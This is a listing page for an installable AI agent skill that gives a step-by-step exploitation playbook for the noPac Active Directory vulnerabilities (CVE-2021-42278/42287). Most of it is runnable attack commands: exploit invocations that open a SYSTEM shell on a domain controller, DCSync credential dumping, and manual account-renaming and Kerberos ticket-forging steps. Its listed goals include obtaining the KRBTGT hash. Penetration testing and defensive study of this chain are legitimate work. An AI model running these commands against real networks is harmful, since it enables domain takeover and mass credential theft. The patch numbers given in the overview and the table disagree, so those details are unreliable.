Agent skill

exploiting-nopac-cve-2021-42278-42287

Exploit the noPac vulnerability chain (CVE-2021-42278 sAMAccountName spoofing and CVE-2021-42287 KDC PAC confusion) to escalate from standard domain user to Domain Admin in Active Directory environments.

View SKILL.md on GitHub Repository
Stars 0
Forks 0

Install this agent skill to your Project

npx add-skill https://github.com/autohandai/community-skills/tree/main/exploiting-nopac-cve-2021-42278-42287

SKILL.md

Exploiting noPac (CVE-2021-42278 / CVE-2021-42287)

Overview

noPac is a critical exploit chain combining two Active Directory vulnerabilities: CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion). Together, they allow any authenticated domain user to escalate to Domain Admin privileges, potentially achieving full domain compromise in under 60 seconds. CVE-2021-42278 allows an attacker to modify a machine account's sAMAccountName attribute to match a Domain Controller's name (minus the trailing $). CVE-2021-42287 exploits a flaw in the Kerberos PAC validation where the KDC, unable to find the renamed account, falls back to appending $ and issues a ticket for the Domain Controller account. Microsoft patched both vulnerabilities in November 2021 (KB5008380 and KB5008602), but many environments remain unpatched. The exploit was publicly released by cube0x0 and Ridter in December 2021.

Objectives

  • Scan the target domain for noPac vulnerability (CVE-2021-42278/42287)
  • Create or leverage a machine account with modified sAMAccountName
  • Exploit the KDC PAC confusion to obtain a TGT for the Domain Controller
  • Use the DC ticket to perform DCSync and dump domain credentials
  • Achieve Domain Admin access from a standard domain user account
  • Document the complete exploitation chain with evidence

MITRE ATT&CK Mapping

  • T1068 - Exploitation for Privilege Escalation
  • T1136.002 - Create Account: Domain Account
  • T1078.002 - Valid Accounts: Domain Accounts
  • T1558 - Steal or Forge Kerberos Tickets
  • T1003.006 - OS Credential Dumping: DCSync

Implementation Steps

Phase 1: Vulnerability Scanning

  1. Check if the domain is vulnerable using the noPac scanner:
    bash
    # Using cube0x0's noPac scanner
python3 scanner.py domain.local/user:'Password123' -dc-ip 10.10.10.1

# Using CrackMapExec module
crackmapexec smb 10.10.10.1 -u user -p 'Password123' -M nopac
  2. Verify the MachineAccountQuota (default is 10, allows any user to join computers):
    bash
    # Check MachineAccountQuota via LDAP
python3 -c "
import ldap3
server = ldap3.Server('10.10.10.1')
conn = ldap3.Connection(server, 'domain.local\\user', 'Password123', auto_bind=True)
conn.search('DC=domain,DC=local', '(objectClass=domain)', attributes=['ms-DS-MachineAccountQuota'])
print(conn.entries[0]['ms-DS-MachineAccountQuota'])
"

Phase 2: Exploitation with noPac Tool

  1. Run the full noPac exploit chain:
    bash
    # Using cube0x0's noPac (gets a shell on the DC)
python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \
  -dc-host DC01 -shell --impersonate administrator -use-ldap

# Using Ridter's noPac (alternative implementation)
python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \
  --impersonate administrator -dump
  2. The exploit automatically:
    • Creates a new machine account (or uses an existing one)
    • Renames the machine account's sAMAccountName to match the DC (e.g., "DC01")
    • Requests a TGT for the spoofed account name
    • Restores the original sAMAccountName
    • Uses S4U2self to obtain a service ticket impersonating the target user
    • The KDC finds no account matching "DC01" and falls back to "DC01$" (the real DC)

Phase 3: Post-Exploitation

  1. With the obtained Domain Controller ticket, perform DCSync:
    bash
    # DCSync using secretsdump.py with the Kerberos ticket
export KRB5CCNAME=administrator.ccache
secretsdump.py -k -no-pass domain.local/administrator@DC01.domain.local

# Or directly through the noPac shell
# The shell runs as SYSTEM on the DC
  2. Alternatively, obtain a semi-interactive shell:
    bash
    python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \
  -dc-host DC01 -shell --impersonate administrator -use-ldap

Phase 4: Manual Exploitation Steps

  1. Create a machine account:
    bash
    addcomputer.py -computer-name 'ATTACKPC$' -computer-pass 'AttackPass123' \
  -dc-ip 10.10.10.1 domain.local/user:'Password123'
  2. Clear the SPN and rename sAMAccountName:
    bash
    # Rename machine account sAMAccountName to DC name (without $)
renameMachine.py -current-name 'ATTACKPC$' -new-name 'DC01' \
  -dc-ip 10.10.10.1 domain.local/user:'Password123'
  3. Request a TGT for the spoofed name:
    bash
    getTGT.py -dc-ip 10.10.10.1 domain.local/'DC01':'AttackPass123'
  4. Restore the original machine name:
    bash
    renameMachine.py -current-name 'DC01' -new-name 'ATTACKPC$' \
  -dc-ip 10.10.10.1 domain.local/user:'Password123'
  5. Use S4U2self for impersonation:
    bash
    export KRB5CCNAME=DC01.ccache
getST.py -self -impersonate 'administrator' -altservice 'cifs/DC01.domain.local' \
  -k -no-pass -dc-ip 10.10.10.1 domain.local/'ATTACKPC$'

Tools and Resources

Tool Purpose Platform
noPac (cube0x0) Automated scanner and exploiter Python
noPac (Ridter) Alternative exploit implementation Python
Impacket Kerberos ticket manipulation, DCSync Python
CrackMapExec Vulnerability scanning module Python
Rubeus Windows Kerberos ticket operations Windows (.NET)
secretsdump.py Post-exploitation credential dumping Python

CVE Details

CVE Description CVSS Patch
CVE-2021-42278 sAMAccountName spoofing (machine accounts) 7.5 KB5008102
CVE-2021-42287 KDC PAC confusion / privilege escalation 7.5 KB5008380

Detection Signatures

Indicator Detection Method
Machine account sAMAccountName change Event 4742 (computer account changed) with sAMAccountName modification
New machine account creation Event 4741 (computer object created)
TGT request for account without trailing $ Kerberos audit log analysis
S4U2self requests from non-DC machine accounts Event 4769 with unusual service ticket requests
Rapid sequence: create account, rename, request TGT SIEM correlation rule for noPac attack pattern

Validation Criteria

  • Domain scanned for noPac vulnerability
  • MachineAccountQuota verified (default 10)
  • Exploit executed successfully (shell or DCSync)
  • Domain Admin privileges obtained from standard user
  • DCSync performed to dump domain credentials
  • KRBTGT hash obtained for persistence validation
  • Attack chain documented with timestamps
  • Patch status verified (KB5008380, KB5008602)

Recommended Agent Skills

Expand your agent's capabilities with these related and highly-rated skills.

autohandai/community-skills

mapping-mitre-attack-techniques

Maps observed adversary behaviors, security alerts, and detection rules to MITRE ATT&CK techniques and sub-techniques to quantify detection coverage and guide control prioritization. Use when building an ATT&CK-based coverage heatmap, tagging SIEM alerts with technique IDs, aligning security controls to adversary playbooks, or reporting threat exposure to executives. Activates for requests involving ATT&CK Navigator, Sigma rules, MITRE D3FEND, or coverage gap analysis.

0 0
Explore
autohandai/community-skills

hunting-for-spearphishing-indicators

Hunt for spearphishing campaign indicators across email logs, endpoint telemetry, and network data to detect targeted email attacks.

0 0
Explore
autohandai/community-skills

analyzing-malicious-url-with-urlscan

URLScan.io is a free service for scanning and analyzing suspicious URLs. It captures screenshots, DOM content, HTTP transactions, JavaScript behavior, and network connections of web pages in an isolat

0 0
Explore
autohandai/community-skills

implementing-zero-standing-privilege-with-cyberark

Deploy CyberArk Secure Cloud Access to eliminate standing privileges in hybrid and multi-cloud environments using just-in-time access with time, entitlement, and approval controls.

0 0
Explore
autohandai/community-skills

implementing-pam-for-database-access

Deploy privileged access management for database systems including Oracle, SQL Server, PostgreSQL, and MySQL. Covers session proxy configuration, credential vaulting, query auditing, dynamic credentia

0 0
Explore
autohandai/community-skills

detecting-t1003-credential-dumping-with-edr

Detect OS credential dumping techniques targeting LSASS memory, SAM database, NTDS.dit, and cached credentials using EDR telemetry, Sysmon process access monitoring, and Windows security event correlation.

0 0
Explore

Didn't find tool you were looking for?

Be as detailed as possible for better results